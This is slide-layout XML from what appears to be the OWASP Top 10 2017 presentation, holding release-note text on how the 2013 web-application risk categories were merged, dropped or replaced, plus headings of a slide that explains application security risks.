                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4 Insecure direct object references </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7 Missing function level access control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8 CSRF. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Less than 5% of the data set supports CSRF today, which places it around #13 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 Unvalidated redirects and forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Less than 1% of the data set supports this issue today, as it’s now #25</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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73" name="Table 72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291975370"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5455920"/>
          <a:ext cx="6858000" cy="368808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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="334298">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3276600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="332204">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a:solidFill>
                            <a:srgbClr val="EEC4E3"/>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rgbClr val="EEC4E3"/>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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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xmlns="" val="10000"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1 – 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rgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-Injection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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2 – Broken Authentication and Session Management</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rgbClr val="83276B"/>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rgbClr val="83276B"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2:2017-Broken Authentication </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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3 – 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83276B"/>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rgbClr val="83276B"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-Sensitive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3"/>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 – Insecure Direct Object References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Merged+A7]</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83276B"/>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1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entity (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>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xmlns="" val="10004"/>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 – Security Misconfiguration</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rgbClr val="83276B"/>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rgbClr val="83276B"/>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A5:2017-Broken Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Merged]</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5"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6 – 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rgbClr val="83276B"/>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rgbClr val="83276B"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration</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xmlns="" val="10006"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Level</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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83276B"/>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1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8 – Cross-Site Request Forgery (CSRF)</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rgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>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 Community]</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xmlns="" val="10008"/>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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9 – 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rgbClr val="83276B"/>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rgbClr val="83276B"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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9"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 – Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>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rgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>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A10:2017-Insufficient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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NEW,Comm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.]</a:t>
                      </a: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xmlns="" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Release Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2688431" y="7439819"/>
            <a:ext cx="85883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010400"/>
            <a:ext cx="615948" cy="394295"/>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67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="857915697"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3962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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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3626122">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US"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en-US"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Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950"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may </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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950"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overall risk.</a:t>
                      </a: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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="275144" y="1905000"/>
            <a:ext cx="6201856" cy="2102620"/>
            <a:chOff x="275144" y="2088380"/>
            <a:chExt cx="6201856" cy="2102620"/>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17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="275144" y="2088380"/>
              <a:ext cx="575800"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41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1325915" y="2088380"/>
              <a:ext cx="607859"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Attack</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Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2680936" y="2088380"/>
              <a:ext cx="870752"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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Weaknesses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581012" y="2088380"/>
              <a:ext cx="716864"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Technical</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4" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5760742" y="2088380"/>
              <a:ext cx="697628"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Business</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24935" y="2090853"/>
              <a:ext cx="659155"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Security</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Controls</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
